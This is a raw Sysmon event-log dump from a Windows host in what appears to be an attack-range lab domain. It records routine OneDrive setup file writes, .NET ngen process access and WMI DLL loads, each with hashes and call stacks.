14:58:28.577{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EC14-607E-4A0E-00000000BB01}4208C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000079819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.169{A7A01FEF-EC13-607E-430E-00000000BB01}6372C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exeC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3,IMPHASH=481A52B415277FC8692C7D6D9EA3475CtrueMicrosoft WindowsValid 734700x800000000000000079818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.226{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3,IMPHASH=481A52B415277FC8692C7D6D9EA3475CtrueMicrosoft WindowsValid 10341000x800000000000000079817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.567{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-490E-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.566{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.555{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC14-607E-490E-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.555{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC14-607E-490E-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.548{A7A01FEF-B624-607E-0A00-00000000BB01}8526268C:\Windows\system32\services.exe{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.512{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveStandaloneUpdater.exeMD5=4F6374A871C1D85A31B172061C785E92,SHA256=37675A3F272700BF3BE32C5CE4AC78E3390BF9A210AC62B304F876B2A929345C,IMPHASH=DDED089A98AA2CAD28EE371811657DE9truetrue 11241100x800000000000000079811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:28.486{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe2021-04-20 14:58:28.486 23542300x800000000000000079810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.484{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDrive.VisualElementsManifest.xmlMD5=DDCBC6AB58FF4F81ACE430E932179977,SHA256=2647BC7D5D80E3A1323793D3125CC845CE067A7BEF4521CF8DBE8955F9587135,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.484{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-480E-00000000BB01}1980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.482{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Resources.priMD5=7473BE9C7899F2A2DA99D09C596B2D6D,SHA256=E1252527BC066DA6838344D49660E4C6FF2D1DDFDA036C5EC19B07FDFB90C8C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.479{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.scale-400.pngMD5=80272785B68CEE17562300786F0FA59B,SHA256=BB89239434644337760C382DB336F80E16494D12D3E9258985DA74B734F423A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.477{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.scale-200.pngMD5=5BE57D0496257EC3B690A85C7AFEEA95,SHA256=3EC8CF118D4EEF4C6AF68CB5C679B71991C37E5A0F72AD9C3BF4027AFB4180FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.474{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.scale-150.pngMD5=8A85AA646709AE9D2681F83ED85D14F2,SHA256=35FCC1231BDD1BF82FEB86777EC5EC982515B188CB9C52DDAB9FF43D9FAB0366,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.472{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.scale-125.pngMD5=BDA3BAF91F230BF2B10E2E019ABC3EFF,SHA256=D2D097D39687AC886D8836A553F8D1B581723094AE5539A259C0259585D99475,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.469{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.scale-100.pngMD5=52F5BE0F8D3C5150B591A4656A50D6B0,SHA256=B00B6A09F4AA9DFFF7026FF9C2EA5EC0236B05AE8B99D0CDB35C3A1EA78A5D2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.465{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-white_scale-400.pngMD5=A85ADDC7DF73937053D80FDFAAFDB76A,SHA256=A1A9AEF9837E8A555AE95338FC358FCF24A8ACCC2AAF6E49B8FEC60818A7216E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.463{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-white_scale-200.pngMD5=40FEB212FAF4DCF564629E23A310FFA4,SHA256=FB0DACBD8567FBB468A506AB8B33AFA95D555DA74AEF8EB1ECCBF928216E8C26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.461{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-white_scale-150.pngMD5=0E3D8F803AD480D38DA0A3B925C02106,SHA256=225D709C0E85F6E37C9F2625DE07C4572A945F165D80E14A50906927821064B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.458{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-white_scale-125.pngMD5=B7D80EEA5EC49B3620D1E15D81912EE4,SHA256=3A50DA1C6A1BFE9F6ACC0594B740F5544C6304C1AABBDF4D04CEE367FB811150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.455{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-white_scale-100.pngMD5=1AF06C14BAF9292118292D2E86E10F4B,SHA256=CA3F45E98FCD7A144623B75B6C8ED907C00E3D410627EB0091F01423DBAC8DC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.452{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-black_scale-400.pngMD5=80272785B68CEE17562300786F0FA59B,SHA256=BB89239434644337760C382DB336F80E16494D12D3E9258985DA74B734F423A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.450{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-black_scale-200.pngMD5=5BE57D0496257EC3B690A85C7AFEEA95,SHA256=3EC8CF118D4EEF4C6AF68CB5C679B71991C37E5A0F72AD9C3BF4027AFB4180FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.448{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-black_scale-150.pngMD5=8A85AA646709AE9D2681F83ED85D14F2,SHA256=35FCC1231BDD1BF82FEB86777EC5EC982515B188CB9C52DDAB9FF43D9FAB0366,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.445{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-black_scale-125.pngMD5=BDA3BAF91F230BF2B10E2E019ABC3EFF,SHA256=D2D097D39687AC886D8836A553F8D1B581723094AE5539A259C0259585D99475,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.443{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveSmallTile.contrast-black_scale-100.pngMD5=52F5BE0F8D3C5150B591A4656A50D6B0,SHA256=B00B6A09F4AA9DFFF7026FF9C2EA5EC0236B05AE8B99D0CDB35C3A1EA78A5D2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.440{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.scale-400.pngMD5=1554DD2698B5F2D81445704D4F4C58BA,SHA256=F31EB37B641E0AB8782EF294ADB57D31135E5AAD8838C06F8FDB0A86929E39C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.437{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.scale-200.pngMD5=A2184C1047A0C1FAB0F465F2355CCF92,SHA256=EB846E01333B2DD4CE1C2AECCBD6D90874F976948B881AA362E13593A254AD70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.434{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.scale-150.pngMD5=262B8476753F83B4ABD01017DCDB061F,SHA256=EF6AC1CAA0AEBE3D94BA86856FD69D68F370588A678B1B6F9F90C83B161D87AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.432{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.scale-125.pngMD5=F837C5AA1F38D8241B28B92D15EEBE75,SHA256=CC134DAAA737E48E0F37FF5BECE33E23484C47B55CB6571F3283E73E14F54334,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.430{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.scale-100.pngMD5=433D5C9BFE71C70E6BF1F18B7DA188F4,SHA256=3BA55B200B58756480679CF8B6B98D7B3570F8DFCDB39186F721357DA8D8172C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.427{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-white_scale-400.pngMD5=28005183D565FD56057FF53C2271C256,SHA256=ECF4E09027031C0DC5F66CBEEF68A96D59947C6EFF969FEF9908DDBBF9CDD3E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.424{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-white_scale-200.pngMD5=D69B68D21ED0C659704BCA13218267C0,SHA256=78AEA1A92CF325B6F2B1C8D2438122A3A38396EF28CCF4E6A77896BD1D04A31F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.422{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-white_scale-150.pngMD5=748E43B4DA7F7FC91A98534F1C90C32F,SHA256=4EABC71F16AFAAFF190302A2656FC9FAF542632B75F8294C721D008B9A51B46A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.420{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-white_scale-125.pngMD5=5588D3464D135BDA19ECB5F6284F1AA5,SHA256=2AA13D9AB91C6E04292A1D4E635FDD337088CCD8CEBECE9880C5FC67CED53FAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.417{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-white_scale-100.pngMD5=F0FD948F7E9D30F657C55490C70EE327,SHA256=24685CA3546F1F95F9E9BECA29534E134E69B031923E45723558201762BBA147,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.415{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-black_scale-400.pngMD5=1554DD2698B5F2D81445704D4F4C58BA,SHA256=F31EB37B641E0AB8782EF294ADB57D31135E5AAD8838C06F8FDB0A86929E39C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.413{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-black_scale-200.pngMD5=A2184C1047A0C1FAB0F465F2355CCF92,SHA256=EB846E01333B2DD4CE1C2AECCBD6D90874F976948B881AA362E13593A254AD70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.410{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-black_scale-150.pngMD5=262B8476753F83B4ABD01017DCDB061F,SHA256=EF6AC1CAA0AEBE3D94BA86856FD69D68F370588A678B1B6F9F90C83B161D87AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.408{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LogoImages\OneDriveMedTile.contrast-black_scale-125.pngMD5=F837C5AA1F38D8241B28B92D15EEBE75,SHA256=CC134DAAA737E48E0F37FF5BECE33E23484C47B55CB6571F3283E73E14F54334,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 